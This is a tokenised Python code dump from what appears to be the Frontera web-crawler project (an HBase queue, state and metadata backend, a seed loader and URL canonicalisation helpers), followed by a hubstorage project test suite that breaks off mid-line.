[ cf + '<STR_LIT::>' + k ] = func ( v ) <EOL> return obj <EOL> def utcnow_timestamp ( ) : <EOL> d = datetime . utcnow ( ) <EOL> return timegm ( d . timetuple ( ) ) <EOL> class HBaseQueue ( Queue ) : <EOL> GET_RETRIES = <NUM_LIT:3> <EOL> def __init__ ( self , connection , partitions , logger , table_name , drop = False ) : <EOL> self . 
connection = connection <EOL> self . partitions = [ i for i in range ( <NUM_LIT:0> , partitions ) ] <EOL> self . partitioner = Crc32NamePartitioner ( self . partitions ) <EOL> self . logger = logger <EOL> self . table_name = table_name <EOL> tables = set ( self . connection . tables ( ) ) <EOL> if drop and self . table_name in tables : <EOL> self . connection . delete_table ( self . table_name , disable = True ) <EOL> tables . remove ( self . table_name ) <EOL> if self . table_name not in tables : <EOL> self . connection . create_table ( self . table_name , { '<STR_LIT:f>' : { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> def frontier_start ( self ) : <EOL> pass <EOL> def frontier_stop ( self ) : <EOL> pass <EOL> def schedule ( self , batch ) : <EOL> to_schedule = [ ] <EOL> for fprint , score , request , schedule in batch : <EOL> if schedule : <EOL> if '<STR_LIT>' not in request . meta : <EOL> _ , hostname , _ , _ , _ , _ = parse_domain_from_url_fast ( request . url ) <EOL> if not hostname : <EOL> self . logger . error ( "<STR_LIT>" % ( request . url , fprint ) ) <EOL> request . meta [ '<STR_LIT>' ] = { '<STR_LIT:name>' : hostname } <EOL> to_schedule . append ( ( score , fprint , request . meta [ '<STR_LIT>' ] , request . url ) ) <EOL> self . _schedule ( to_schedule ) <EOL> def _schedule ( self , batch ) : <EOL> """<STR_LIT>""" <EOL> def get_crc32 ( name ) : <EOL> return crc32 ( name ) if type ( name ) is str else crc32 ( name . 
encode ( '<STR_LIT:utf-8>' , '<STR_LIT:ignore>' ) ) <EOL> def get_interval ( score , resolution ) : <EOL> if score < <NUM_LIT:0.0> or score > <NUM_LIT:1.0> : <EOL> raise OverflowError <EOL> i = int ( score / resolution ) <EOL> if i % <NUM_LIT:10> == <NUM_LIT:0> and i > <NUM_LIT:0> : <EOL> i = i - <NUM_LIT:1> <EOL> return ( i * resolution , ( i + <NUM_LIT:1> ) * resolution ) <EOL> timestamp = int ( time ( ) * <NUM_LIT> ) <EOL> data = dict ( ) <EOL> for score , fingerprint , domain , url in batch : <EOL> if type ( domain ) == dict : <EOL> partition_id = self . partitioner . partition ( domain [ '<STR_LIT:name>' ] , self . partitions ) <EOL> host_crc32 = get_crc32 ( domain [ '<STR_LIT:name>' ] ) <EOL> elif type ( domain ) == int : <EOL> partition_id = self . partitioner . partition_by_hash ( domain , self . partitions ) <EOL> host_crc32 = domain <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> item = ( unhexlify ( fingerprint ) , host_crc32 , url , score ) <EOL> score = <NUM_LIT:1> - score <EOL> rk = "<STR_LIT>" % ( partition_id , "<STR_LIT>" % get_interval ( score , <NUM_LIT> ) , timestamp ) <EOL> data . setdefault ( rk , [ ] ) . append ( ( score , item ) ) <EOL> table = self . connection . table ( self . table_name ) <EOL> with table . batch ( transaction = True ) as b : <EOL> for rk , tuples in data . iteritems ( ) : <EOL> obj = dict ( ) <EOL> for score , item in tuples : <EOL> column = '<STR_LIT>' % get_interval ( score , <NUM_LIT> ) <EOL> obj . setdefault ( column , [ ] ) . append ( item ) <EOL> final = dict ( ) <EOL> packer = Packer ( ) <EOL> for column , items in obj . iteritems ( ) : <EOL> stream = BytesIO ( ) <EOL> for item in items : <EOL> stream . write ( packer . pack ( item ) ) <EOL> final [ column ] = stream . getvalue ( ) <EOL> b . put ( rk , final ) <EOL> def get_next_requests ( self , max_n_requests , partition_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> min_requests = kwargs . pop ( '<STR_LIT>' ) <EOL> min_hosts = kwargs . 
pop ( '<STR_LIT>' ) <EOL> max_requests_per_host = kwargs . pop ( '<STR_LIT>' ) <EOL> assert ( max_n_requests > min_requests ) <EOL> table = self . connection . table ( self . table_name ) <EOL> meta_map = { } <EOL> queue = { } <EOL> limit = min_requests <EOL> tries = <NUM_LIT:0> <EOL> count = <NUM_LIT:0> <EOL> while tries < self . GET_RETRIES : <EOL> tries += <NUM_LIT:1> <EOL> limit *= <NUM_LIT> if tries > <NUM_LIT:1> else <NUM_LIT:1.0> <EOL> self . logger . debug ( "<STR_LIT>" % ( tries , limit , count , len ( queue . keys ( ) ) ) ) <EOL> meta_map . clear ( ) <EOL> queue . clear ( ) <EOL> count = <NUM_LIT:0> <EOL> for rk , data in table . scan ( row_prefix = '<STR_LIT>' % partition_id , limit = int ( limit ) , batch_size = <NUM_LIT> ) : <EOL> for cq , buf in data . iteritems ( ) : <EOL> stream = BytesIO ( buf ) <EOL> unpacker = Unpacker ( stream ) <EOL> for item in unpacker : <EOL> fingerprint , host_crc32 , url , score = item <EOL> if host_crc32 not in queue : <EOL> queue [ host_crc32 ] = [ ] <EOL> if max_requests_per_host is not None and len ( queue [ host_crc32 ] ) > max_requests_per_host : <EOL> continue <EOL> queue [ host_crc32 ] . append ( fingerprint ) <EOL> count += <NUM_LIT:1> <EOL> if fingerprint not in meta_map : <EOL> meta_map [ fingerprint ] = [ ] <EOL> meta_map [ fingerprint ] . append ( ( rk , item ) ) <EOL> if count > max_n_requests : <EOL> break <EOL> if min_hosts is not None and len ( queue . keys ( ) ) < min_hosts : <EOL> continue <EOL> if count < min_requests : <EOL> continue <EOL> break <EOL> self . logger . debug ( "<STR_LIT>" % ( tries , len ( queue . keys ( ) ) , count ) ) <EOL> fprint_map = { } <EOL> for fprint , meta_list in meta_map . iteritems ( ) : <EOL> for rk , _ in meta_list : <EOL> fprint_map . setdefault ( rk , [ ] ) . append ( fprint ) <EOL> results = [ ] <EOL> trash_can = set ( ) <EOL> for _ , fprints in queue . 
iteritems ( ) : <EOL> for fprint in fprints : <EOL> for rk , _ in meta_map [ fprint ] : <EOL> if rk in trash_can : <EOL> continue <EOL> for rk_fprint in fprint_map [ rk ] : <EOL> _ , item = meta_map [ rk_fprint ] [ <NUM_LIT:0> ] <EOL> _ , _ , url , score = item <EOL> results . append ( Request ( url , meta = { <EOL> '<STR_LIT>' : hexlify ( rk_fprint ) , <EOL> '<STR_LIT>' : score , <EOL> } ) ) <EOL> trash_can . add ( rk ) <EOL> with table . batch ( transaction = True ) as b : <EOL> for rk in trash_can : <EOL> b . delete ( rk ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( trash_can ) ) ) <EOL> return results <EOL> def count ( self ) : <EOL> return NotImplementedError <EOL> class HBaseState ( States ) : <EOL> def __init__ ( self , connection , table_name , logger , cache_size_limit ) : <EOL> self . connection = connection <EOL> self . _table_name = table_name <EOL> self . logger = logger <EOL> self . _state_cache = { } <EOL> self . _cache_size_limit = cache_size_limit <EOL> def update_cache ( self , objs ) : <EOL> objs = objs if type ( objs ) in [ list , tuple ] else [ objs ] <EOL> def put ( obj ) : <EOL> if obj . meta [ '<STR_LIT:state>' ] is not None : <EOL> self . _state_cache [ obj . meta [ '<STR_LIT>' ] ] = obj . meta [ '<STR_LIT:state>' ] <EOL> map ( put , objs ) <EOL> def set_states ( self , objs ) : <EOL> objs = objs if type ( objs ) in [ list , tuple ] else [ objs ] <EOL> def get ( obj ) : <EOL> fprint = obj . meta [ '<STR_LIT>' ] <EOL> obj . meta [ '<STR_LIT:state>' ] = self . _state_cache [ fprint ] if fprint in self . _state_cache else None <EOL> map ( get , objs ) <EOL> def flush ( self , force_clear ) : <EOL> if len ( self . _state_cache ) > self . _cache_size_limit : <EOL> force_clear = True <EOL> table = self . connection . table ( self . _table_name ) <EOL> for chunk in chunks ( self . _state_cache . items ( ) , <NUM_LIT> ) : <EOL> with table . 
batch ( transaction = True ) as b : <EOL> for fprint , state in chunk : <EOL> hb_obj = prepare_hbase_object ( state = state ) <EOL> b . put ( unhexlify ( fprint ) , hb_obj ) <EOL> if force_clear : <EOL> self . logger . debug ( "<STR_LIT>" % len ( self . _state_cache ) ) <EOL> self . _state_cache . clear ( ) <EOL> def fetch ( self , fingerprints ) : <EOL> to_fetch = [ f for f in fingerprints if f not in self . _state_cache ] <EOL> self . logger . debug ( "<STR_LIT>" % len ( self . _state_cache ) ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( to_fetch ) , len ( fingerprints ) ) ) <EOL> for chunk in chunks ( to_fetch , <NUM_LIT> ) : <EOL> keys = [ unhexlify ( fprint ) for fprint in chunk ] <EOL> table = self . connection . table ( self . _table_name ) <EOL> records = table . rows ( keys , columns = [ '<STR_LIT>' ] ) <EOL> for key , cells in records : <EOL> if '<STR_LIT>' in cells : <EOL> state = unpack ( '<STR_LIT>' , cells [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> self . _state_cache [ hexlify ( key ) ] = state <EOL> class HBaseMetadata ( Metadata ) : <EOL> def __init__ ( self , connection , table_name , drop_all_tables , use_snappy , batch_size , store_content ) : <EOL> self . _table_name = table_name <EOL> tables = set ( connection . tables ( ) ) <EOL> if drop_all_tables and self . _table_name in tables : <EOL> connection . delete_table ( self . _table_name , disable = True ) <EOL> tables . remove ( self . _table_name ) <EOL> if self . _table_name not in tables : <EOL> schema = { '<STR_LIT:m>' : { '<STR_LIT>' : <NUM_LIT:1> } , <EOL> '<STR_LIT:s>' : { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : True , } , <EOL> '<STR_LIT:c>' : { '<STR_LIT>' : <NUM_LIT:1> } <EOL> } <EOL> if use_snappy : <EOL> schema [ '<STR_LIT:m>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> schema [ '<STR_LIT:c>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> connection . create_table ( self . _table_name , schema ) <EOL> table = connection . 
table ( self . _table_name ) <EOL> self . batch = table . batch ( batch_size = batch_size ) <EOL> self . store_content = store_content <EOL> def frontier_start ( self ) : <EOL> pass <EOL> def frontier_stop ( self ) : <EOL> self . flush ( ) <EOL> def flush ( self ) : <EOL> self . batch . send ( ) <EOL> def add_seeds ( self , seeds ) : <EOL> for seed in seeds : <EOL> obj = prepare_hbase_object ( url = seed . url , <EOL> depth = <NUM_LIT:0> , <EOL> created_at = utcnow_timestamp ( ) , <EOL> domain_fingerprint = seed . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . batch . put ( unhexlify ( seed . meta [ '<STR_LIT>' ] ) , obj ) <EOL> def page_crawled ( self , response , links ) : <EOL> obj = prepare_hbase_object ( status_code = response . status_code , content = response . body ) if self . store_content else prepare_hbase_object ( status_code = response . status_code ) <EOL> links_dict = dict ( ) <EOL> for link in links : <EOL> links_dict [ unhexlify ( link . meta [ '<STR_LIT>' ] ) ] = ( link , link . url , link . meta [ '<STR_LIT>' ] ) <EOL> self . batch . put ( unhexlify ( response . meta [ '<STR_LIT>' ] ) , obj ) <EOL> for link_fingerprint , ( link , link_url , link_domain ) in links_dict . iteritems ( ) : <EOL> obj = prepare_hbase_object ( url = link_url , <EOL> created_at = utcnow_timestamp ( ) , <EOL> domain_fingerprint = link_domain [ '<STR_LIT>' ] ) <EOL> self . batch . put ( link_fingerprint , obj ) <EOL> def request_error ( self , request , error ) : <EOL> obj = prepare_hbase_object ( url = request . url , <EOL> created_at = utcnow_timestamp ( ) , <EOL> error = error , <EOL> domain_fingerprint = request . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> rk = unhexlify ( request . meta [ '<STR_LIT>' ] ) <EOL> self . batch . put ( rk , obj ) <EOL> def update_score ( self , batch ) : <EOL> if not isinstance ( batch , dict ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> for fprint , ( score , url , schedule ) in batch . 
iteritems ( ) : <EOL> obj = prepare_hbase_object ( score = score ) <EOL> rk = unhexlify ( fprint ) <EOL> self . batch . put ( rk , obj ) <EOL> class HBaseBackend ( DistributedBackend ) : <EOL> component_name = '<STR_LIT>' <EOL> def __init__ ( self , manager ) : <EOL> self . manager = manager <EOL> self . logger = manager . logger . backend <EOL> settings = manager . settings <EOL> port = settings . get ( '<STR_LIT>' ) <EOL> hosts = settings . get ( '<STR_LIT>' ) <EOL> namespace = settings . get ( '<STR_LIT>' ) <EOL> self . queue_partitions = settings . get ( '<STR_LIT>' ) <EOL> host = choice ( hosts ) if type ( hosts ) in [ list , tuple ] else hosts <EOL> kwargs = { <EOL> '<STR_LIT:host>' : host , <EOL> '<STR_LIT:port>' : int ( port ) , <EOL> '<STR_LIT>' : namespace , <EOL> '<STR_LIT>' : '<STR_LIT::>' <EOL> } <EOL> if settings . get ( '<STR_LIT>' ) : <EOL> kwargs . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . connection = Connection ( ** kwargs ) <EOL> self . _metadata = None <EOL> self . _queue = None <EOL> self . _states = None <EOL> @ classmethod <EOL> def strategy_worker ( cls , manager ) : <EOL> o = cls ( manager ) <EOL> settings = manager . settings <EOL> o . _states = HBaseState ( o . connection , settings . get ( '<STR_LIT>' ) , o . manager . logger . backend , <EOL> settings . get ( '<STR_LIT>' ) ) <EOL> return o <EOL> @ classmethod <EOL> def db_worker ( cls , manager ) : <EOL> o = cls ( manager ) <EOL> settings = manager . settings <EOL> drop_all_tables = settings . get ( '<STR_LIT>' ) <EOL> o . _queue = HBaseQueue ( o . connection , o . queue_partitions , o . manager . logger . backend , <EOL> settings . get ( '<STR_LIT>' ) , drop = drop_all_tables ) <EOL> o . _metadata = HBaseMetadata ( o . connection , settings . get ( '<STR_LIT>' ) , drop_all_tables , <EOL> settings . get ( '<STR_LIT>' ) , settings . get ( '<STR_LIT>' ) , <EOL> settings . 
get ( '<STR_LIT>' ) ) <EOL> return o <EOL> @ property <EOL> def metadata ( self ) : <EOL> return self . _metadata <EOL> @ property <EOL> def queue ( self ) : <EOL> return self . _queue <EOL> @ property <EOL> def states ( self ) : <EOL> return self . _states <EOL> def frontier_start ( self ) : <EOL> for component in [ self . metadata , self . queue , self . states ] : <EOL> if component : <EOL> component . frontier_start ( ) <EOL> def frontier_stop ( self ) : <EOL> for component in [ self . metadata , self . queue , self . states ] : <EOL> if component : <EOL> component . frontier_stop ( ) <EOL> self . connection . close ( ) <EOL> def add_seeds ( self , seeds ) : <EOL> self . metadata . add_seeds ( seeds ) <EOL> def page_crawled ( self , response , links ) : <EOL> self . metadata . page_crawled ( response , links ) <EOL> def request_error ( self , page , error ) : <EOL> self . metadata . request_error ( page , error ) <EOL> def finished ( self ) : <EOL> raise NotImplementedError <EOL> def get_next_requests ( self , max_next_requests , ** kwargs ) : <EOL> next_pages = [ ] <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> partitions = set ( kwargs . pop ( '<STR_LIT>' , [ ] ) ) <EOL> for partition_id in range ( <NUM_LIT:0> , self . queue_partitions ) : <EOL> if partition_id not in partitions : <EOL> continue <EOL> results = self . queue . get_next_requests ( max_next_requests , partition_id , min_requests = <NUM_LIT:64> , <EOL> min_hosts = <NUM_LIT> , max_requests_per_host = <NUM_LIT> ) <EOL> next_pages . extend ( results ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( results ) , partition_id ) ) <EOL> return next_pages </s>
<s> import codecs <EOL> from scrapy . exceptions import NotConfigured <EOL> from frontera . contrib . scrapy . middlewares . seeds import SeedLoader <EOL> class FileSeedLoader ( SeedLoader ) : <EOL> def configure ( self , settings ) : <EOL> self . seeds_source = settings . get ( '<STR_LIT>' ) <EOL> if not self . seeds_source : <EOL> raise NotConfigured <EOL> def load_seeds ( self ) : <EOL> return self . load_seeds_from_file ( self . seeds_source ) <EOL> def load_seeds_from_file ( self , file_path ) : <EOL> with codecs . open ( file_path , '<STR_LIT>' ) as f : <EOL> return self . load_seeds_from_data ( ( f ) ) <EOL> def load_seeds_from_data ( self , data ) : <EOL> seeds = [ ] <EOL> for seed in data : <EOL> clean_seed = self . clean_seed ( seed ) <EOL> if clean_seed : <EOL> seeds . append ( clean_seed ) <EOL> return seeds <EOL> def clean_seed ( self , url ) : <EOL> return url . strip ( '<STR_LIT>' ) </s>
<s> from frontera . contrib . canonicalsolvers import Basic <EOL> from frontera . core . models import Request , Response <EOL> def test_basic ( ) : <EOL> cs = Basic ( ) <EOL> r = Request ( url = "<STR_LIT>" ) <EOL> re = Response ( url = "<STR_LIT>" , request = r ) <EOL> re . meta [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> re . meta [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> re . meta [ '<STR_LIT>' ] = [ "<STR_LIT>" ] <EOL> cs . page_crawled ( re , [ ] ) <EOL> assert re . url == "<STR_LIT>" </s>
<s> import urlparse <EOL> import urllib <EOL> import cgi <EOL> import hashlib <EOL> from six import moves <EOL> from w3lib . util import unicode_to_str <EOL> _ALWAYS_SAFE_BYTES = ( b'<STR_LIT>' <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' b'<STR_LIT>' ) <EOL> _reserved = b'<STR_LIT>' <EOL> _unreserved_marks = b"<STR_LIT>" <EOL> _safe_chars = _ALWAYS_SAFE_BYTES + b'<STR_LIT:%>' + _reserved + _unreserved_marks <EOL> def parse_url ( url , encoding = None ) : <EOL> """<STR_LIT>""" <EOL> return url if isinstance ( url , urlparse . ParseResult ) else urlparse . urlparse ( unicode_to_str ( url , encoding ) ) <EOL> def parse_domain_from_url ( url ) : <EOL> """<STR_LIT>""" <EOL> import tldextract <EOL> extracted = tldextract . extract ( url ) <EOL> scheme , _ , _ , _ , _ , _ = parse_url ( url ) <EOL> sld = extracted . domain <EOL> tld = extracted . suffix <EOL> subdomain = extracted . subdomain <EOL> name = '<STR_LIT:.>' . join ( [ sld , tld ] ) if tld else sld <EOL> netloc = '<STR_LIT:.>' . join ( [ subdomain , name ] ) if subdomain else name <EOL> return netloc , name , scheme , sld , tld , subdomain <EOL> def parse_domain_from_url_fast ( url ) : <EOL> """<STR_LIT>""" <EOL> result = parse_url ( url ) <EOL> return result . netloc , result . hostname , result . scheme , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> def safe_url_string ( url , encoding = '<STR_LIT:utf8>' ) : <EOL> """<STR_LIT>""" <EOL> s = unicode_to_str ( url , encoding ) <EOL> return moves . urllib . parse . quote ( s , _safe_chars ) <EOL> def _unquotepath ( path ) : <EOL> for reserved in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> path = path . replace ( '<STR_LIT:%>' + reserved , '<STR_LIT>' + reserved . upper ( ) ) <EOL> return urllib . unquote ( path ) <EOL> def canonicalize_url ( url , keep_blank_values = True , keep_fragments = False ) : <EOL> """<STR_LIT>""" <EOL> scheme , netloc , path , params , query , fragment = parse_url ( url ) <EOL> keyvals = cgi . 
parse_qsl ( query , keep_blank_values ) <EOL> keyvals . sort ( ) <EOL> query = urllib . urlencode ( keyvals ) <EOL> path = safe_url_string ( _unquotepath ( path ) ) or '<STR_LIT:/>' <EOL> fragment = '<STR_LIT>' if not keep_fragments else fragment <EOL> return urlparse . urlunparse ( ( scheme , netloc . lower ( ) , path , params , query , fragment ) ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from random import randint , random <EOL> from requests . exceptions import HTTPError <EOL> from hubstorage import HubstorageClient <EOL> from hubstorage . utils import millitime <EOL> from hstestcase import HSTestCase <EOL> from testutil import failing_downloader <EOL> class ProjectTest ( HSTestCase ) : <EOL> def test_projectid ( self ) : <EOL> p1 = self . hsclient . get_project ( int ( self . projectid ) ) <EOL> p2 = self . hsclient . get_project ( str ( self . projectid ) ) <EOL> self . assertEqual ( p1 . projectid , p2 . projectid ) <EOL> self . assertEqual ( type ( p1 . projectid ) , str ) <EOL> self . assertEqual ( type ( p2 . projectid ) , str ) <EOL> self . assertRaises ( AssertionError , self . hsclient . get_project , '<STR_LIT>' ) <EOL> def test_get_job_from_key ( self ) : <EOL> job = self . project . push_job ( self . spidername ) <EOL> parts = tuple ( job . key . split ( '<STR_LIT:/>' ) ) <EOL> self . assertEqual ( len ( parts ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( parts [ : <NUM_LIT:2> ] , ( self . projectid , self . spiderid ) ) <EOL> samejob1 = self . hsclient . get_job ( job . key ) <EOL> samejob2 = self . project . get_job ( job . key ) <EOL> samejob3 = self . project . get_job ( parts [ <NUM_LIT:1> : ] ) <EOL> self . assertEqual ( samejob1 . key , job . key ) <EOL> self . assertEqual ( samejob2 . key , job . key ) <EOL> self . assertEqual ( samejob3 . key , job . key ) <EOL> def test_get_jobs ( self ) : <EOL> p = self . project <EOL> j1 = p . push_job ( self . spidername , testid = <NUM_LIT:0> ) <EOL> j2 = p . push_job ( self . spidername , testid = <NUM_LIT:1> ) <EOL> j3 = p . push_job ( self . spidername , testid = <NUM_LIT:2> ) <EOL> self . assertTrue ( list ( p . get_jobs ( count = <NUM_LIT:1> , state = '<STR_LIT>' ) ) ) <EOL> r = list ( p . get_jobs ( spider = self . spidername , state = '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ j . key for j in r ] , [ j3 . key , j2 . key , j1 . 
key ] ) <EOL> def test_get_jobs_with_legacy_filter ( self ) : <EOL> p = self . project <EOL> j1 = p . push_job ( self . spidername , state = '<STR_LIT>' , <EOL> close_reason = '<STR_LIT>' , tags = [ '<STR_LIT>' ] ) <EOL> j2 = p . push_job ( self . spidername , state = '<STR_LIT>' , <EOL> close_reason = '<STR_LIT>' , tags = [ '<STR_LIT>' ] ) <EOL> j3 = p . push_job ( self . spidername , state = '<STR_LIT>' ) <EOL> j4 = p . push_job ( self . spidername , state = '<STR_LIT>' , <EOL> close_reason = '<STR_LIT>' , tags = [ '<STR_LIT>' ] ) <EOL> j5 = p . push_job ( self . spidername + '<STR_LIT>' , state = '<STR_LIT>' , <EOL> close_reason = '<STR_LIT>' , tags = [ '<STR_LIT>' ] ) <EOL> filters = [ [ '<STR_LIT>' , '<STR_LIT:=>' , [ self . spidername ] ] , <EOL> [ '<STR_LIT:state>' , '<STR_LIT:=>' , [ '<STR_LIT>' ] ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:=>' , [ '<STR_LIT>' ] ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' ] ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' ] ] ] <EOL> jobs = p . get_jobs ( filter = [ json . dumps ( x ) for x in filters ] ) <EOL> assert [ j . key for j in jobs ] == [ j2 . key ] , jobs <EOL> def test_push_job ( self ) : <EOL> job = self . project . push_job ( self . spidername , state = '<STR_LIT>' , <EOL> priority = self . project . jobq . PRIO_HIGH , <EOL> foo = u'<STR_LIT:bar>' ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:state>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:foo>' ) , u'<STR_LIT:bar>' ) <EOL> self . project . jobq . finish ( job ) <EOL> self . project . jobq . delete ( job ) <EOL> job . metadata . expire ( ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:state>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:foo>' ) , u'<STR_LIT:bar>' ) <EOL> def test_auth ( self ) : <EOL> hsc = HubstorageClient ( endpoint = self . hsclient . endpoint ) <EOL> self . assertEqual ( hsc . auth , None ) <EOL> try : <EOL> hsc . push_job ( self . 
projectid , self . spidername ) <EOL> except HTTPError as exc : <EOL> self . assertTrue ( exc . response . status_code , <NUM_LIT> ) <EOL> else : <EOL> self . assertTrue ( False , '<STR_LIT>' ) <EOL> try : <EOL> hsc . get_project ( self . projectid ) . push_job ( self . spidername ) <EOL> except HTTPError as exc : <EOL> self . assertTrue ( exc . response . status_code , <NUM_LIT> ) <EOL> else : <EOL> self . assertTrue ( False , '<STR_LIT>' ) <EOL> try : <EOL> hsc . get_job ( ( self . projectid , <NUM_LIT:1> , <NUM_LIT:1> ) ) . items . list ( ) <EOL> except HTTPError as exc : <EOL> self . assertTrue ( exc . response . status_code , <NUM_LIT> ) <EOL> else : <EOL> self . assertTrue ( False , '<STR_LIT>' ) <EOL> try : <EOL> hsc . get_project ( self . projectid ) . get_job ( ( self . projectid , <NUM_LIT:1> , <NUM_LIT:1> ) ) . items . list ( ) <EOL> except HTTPError as exc : <EOL> self . assertTrue ( exc . response . status_code , <NUM_LIT> ) <EOL> else : <EOL> self . assertTrue ( False , '<STR_LIT>' ) <EOL> auth = self . hsclient . auth <EOL> project = hsc . get_project ( self . projectid , auth ) <EOL> self . assertEqual ( project . auth , auth ) <EOL> job = project . push_job ( self . spidername ) <EOL> samejob = project . get_job ( job . key ) <EOL> self . assertEqual ( samejob . key , job . key ) <EOL> def test_broad ( self ) : <EOL> project = self . hsclient . get_project ( self . projectid ) <EOL> job = project . push_job ( self . spidername ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:state>' ) , '<STR_LIT>' ) <EOL> job = self . start_job ( ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:state>' ) , '<STR_LIT>' ) <EOL> job . items . write ( { '<STR_LIT:title>' : '<STR_LIT:bar>' } ) <EOL> job . logs . info ( '<STR_LIT>' ) <EOL> job . samples . write ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> job . close_writers ( ) <EOL> job . jobq . finish ( job ) <EOL> jobid = job . key <EOL> jobauth = job . 
auth <EOL> del job <EOL> self . assertTrue ( list ( project . items . list ( self . spiderid , count = <NUM_LIT:1> ) ) ) <EOL> self . assertTrue ( list ( project . logs . list ( self . spiderid , count = <NUM_LIT:1> ) ) ) <EOL> self . assertTrue ( list ( project . samples . list ( self . spiderid , count = <NUM_LIT:1> ) ) ) <EOL> job = project . client . get_job ( jobid , jobauth = jobauth ) <EOL> job . purged ( ) <EOL> def test_settings ( self ) : <EOL> project = self . hsclient . get_project ( self . projectid ) <EOL> settings = dict ( project . settings ) <EOL> settings . pop ( '<STR_LIT>' , None ) <EOL> self . assertEqual ( settings , { } ) <EOL> project . settings [ '<STR_LIT>' ] = created = millitime ( ) <EOL> project . settings [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> project . settings . save ( ) <EOL> self . assertEqual ( project . settings . liveget ( '<STR_LIT>' ) , created ) <EOL> self . assertEqual ( project . settings . liveget ( '<STR_LIT>' ) , [ '<STR_LIT>' ] ) <EOL> project . settings . expire ( ) <EOL> self . assertEqual ( dict ( project . settings ) , { <EOL> '<STR_LIT>' : created , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } ) <EOL> def test_requests ( self ) : <EOL> ts = millitime ( ) <EOL> job = self . project . push_job ( self . spidername , state = '<STR_LIT>' ) <EOL> r1 = job . requests . add ( url = '<STR_LIT>' , status = <NUM_LIT:200> , method = '<STR_LIT:GET>' , <EOL> rs = <NUM_LIT> , duration = <NUM_LIT:5> , parent = None , ts = ts ) <EOL> r2 = job . requests . add ( url = '<STR_LIT>' , status = <NUM_LIT> , method = '<STR_LIT:POST>' , <EOL> rs = <NUM_LIT:0> , duration = <NUM_LIT:1> , parent = r1 , ts = ts + <NUM_LIT:1> ) <EOL> r3 = job . requests . add ( url = '<STR_LIT>' , status = <NUM_LIT> , method = '<STR_LIT>' , <EOL> rs = <NUM_LIT:0> , duration = <NUM_LIT:1> , parent = r1 , ts = ts + <NUM_LIT:2> , fp = '<STR_LIT>' ) <EOL> job . requests . close ( ) <EOL> rr = job . requests . list ( ) <EOL> self . assertEqual ( rr . 
next ( ) , <EOL> { u'<STR_LIT:status>' : <NUM_LIT:200> , u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT:url>' : u'<STR_LIT>' , u'<STR_LIT:time>' : ts , <EOL> u'<STR_LIT>' : <NUM_LIT:5> , u'<STR_LIT>' : u'<STR_LIT:GET>' } ) <EOL> self . assertEqual ( rr . next ( ) , <EOL> { u'<STR_LIT:status>' : <NUM_LIT> , u'<STR_LIT>' : <NUM_LIT:0> , u'<STR_LIT>' : <NUM_LIT:0> , <EOL> u'<STR_LIT:url>' : u'<STR_LIT>' , u'<STR_LIT:time>' : ts + <NUM_LIT:1> , <EOL> u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : u'<STR_LIT:POST>' } ) <EOL> self . assertEqual ( rr . next ( ) , <EOL> { u'<STR_LIT:status>' : <NUM_LIT> , u'<STR_LIT>' : u'<STR_LIT>' , u'<STR_LIT>' : <NUM_LIT:0> , <EOL> u'<STR_LIT>' : <NUM_LIT:0> , u'<STR_LIT:url>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:time>' : ts + <NUM_LIT:2> , u'<STR_LIT>' : <NUM_LIT:1> , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } ) <EOL> self . assertRaises ( StopIteration , rr . next ) <EOL> def test_samples ( self ) : <EOL> j1 = self . project . push_job ( self . spidername , state = '<STR_LIT>' ) <EOL> self . assertEqual ( list ( j1 . samples . list ( ) ) , [ ] ) <EOL> ts = millitime ( ) <EOL> j1 . samples . write ( [ ts , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> j1 . samples . write ( [ ts + <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:4> ] ) <EOL> j1 . samples . flush ( ) <EOL> o = list ( j1 . samples . list ( ) ) <EOL> self . assertEqual ( len ( o ) , <NUM_LIT:2> ) <EOL> self . 